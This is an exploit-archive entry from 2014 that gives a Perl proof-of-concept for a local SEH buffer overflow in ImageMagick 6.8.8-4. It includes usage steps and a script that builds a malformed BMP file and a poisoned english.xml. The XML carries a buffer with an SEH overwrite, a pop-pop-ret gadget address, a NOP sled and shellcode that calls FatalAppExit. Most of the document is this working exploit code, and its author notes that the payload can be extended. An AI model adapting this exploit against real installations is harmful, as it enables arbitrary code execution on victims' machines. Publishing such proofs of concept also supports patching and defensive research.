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zdtMike Czumak1337DAY-ID-21901
HistoryFeb 17, 2014 - 12:00 a.m.

ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)

Mike Czumak

0.01 Low




I saw the notice for this CVE today but there was no known published expoits so

I figured I’d put together this quick POC. Note, all app modules for the tested

version were compiled with safeSEH so my use of an OS module may require adjustment

of the offsets. There also appears to be several bad chars that fail the sploit.

For this POC I only generate a basic messagebox using FatalAppExit(). It may take

some work to get it to do more.#### Usage Info

This particular BOF takes advantage of insecure handling of the english.xml file

which the app uses to display various error messages. I didn’t spend much time

investigating the app so there may be additional vulnerable locations

This script generates two files:

1) a malfored .bmp file that will cause ImageMagick to generate a specific

error when opened (LengthAndFilesizeDoNotMatch), as defined in the

english.xml file

2) a modified english.xml file that replaces the original error message with

our exploit code

To test this POC:

1) run the script, replace the original english.xml file (in App’s folder)

2) open the .bmp file with ImageMagick

sub write_file { 
  my ($file, $buffer) = @_;
  open(FILE, ">$file");
  print FILE $buffer;
  print "Exploit file [" . $file . "] created\n";
  print "Buffer size: " . length($buffer) . "\n"; 
# create bmp file header; needs to be a valid header to generate necessary error
sub bmp_header {
   my $header = "\x42\x4d"; # BM
   $header = $header . "\x46\x00\x00\x00"; # file size (70 bytes)
   $header = $header . "\x00\x00\x00\x00"; # unused 
   $header = $header . "\x36\x00\x00\x00"; # bitmap offset
   $header = $header . "\x28\x00\x00\x00"; # header size
   $header = $header . "\x02\x00\x00\x00"; # width
   $header = $header . "\x02\x00\x00\x00"; # height
   $header = $header . "\x01\x00"; # num of color planes
   $header = $header . "\x18\x00"; # num of bits per pixel
   $header = $header . "\x00\x00\x00\x00"; # compression (none)
   $header = $header . "\x10\x00\x00\x00"; # image size
   $header = $header . "\x13\x0b\x00\x00"; # horizontal resolution (2,835 pixels/meter)
   $header = $header . "\x13\x0b\x00\x00"; # vertical resolution (2,835 pixels/meter)
   $header = $header . "\x00\x00\x00\x00"; # colors in palette
   $header = $header . "\x00\x00\x00\x00"; #important colors
   return $header;
## Construct the corrupted bmp file which will trigger the vuln
my $header = bmp_header();
my $data = "\x41" x (5000 - length($header)); # arbitrary file data filler
my $buffer = $header.$data; 
write_file("corrupt.bmp", $buffer);
# construct the buffer payload for our xml file
my $buffsize = 100000;
my $junk = "\x41" x 62504; # offset to next seh at 568
my $nseh = "\xeb\x32\x90\x90"; # overwrite next seh with jmp instruction (20 bytes)
my $seh = pack('V', 0x74c82f4f); # : pop ebp  pop ebx  ret
                 # ASLR: False, Rebase: False, SafeSEH: False, OS: True, C:\WINDOWS\system32\OLEACC.dll)
my $junk2 = "\x41" x 12; # there are at least two possible offsets -- 1 for  file-> open and 1 for the open file menubar button 
my $nops = "\x90" x 100;
# this is just a POC shellcode that displays a messagebox using the FatalAppExit function 
my $shell = "\xb9\x7c\xec\xa5\x7c" . # Unicode String "FailSilently" (address may vary)
        "\x31\xc0" . # xor eax, eax
        "\xbb\xb2\x1b\x86\x7c" . # kernel32.dll FatalAppExit()
        "\x51" . # push ecx
        "\x50" . # push eax
        "\xff\xd3"; # call ebx
my $sploit = $junk.$nseh.$seh.$junk2.$nseh.$seh.$nops.$shell; # assemble the exploit portion of the buffer
my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer with junk
$sploit = $sploit.$fill; # assemble the final buffer
# build the malicious xml file
my $xml = '<?xml version="1.0" encoding="UTF-8"?><locale name="english"><exception><corrupt><image><warning><message name="LengthAndFilesizeDoNotMatch">'; 
$xml = $xml . $sploit;
$xml = $xml . '</message></warning></image></corrupt></exception></locale>';
my $buffer = $xml;
write_file("english.xml", $buffer);

# [2018-04-13]  #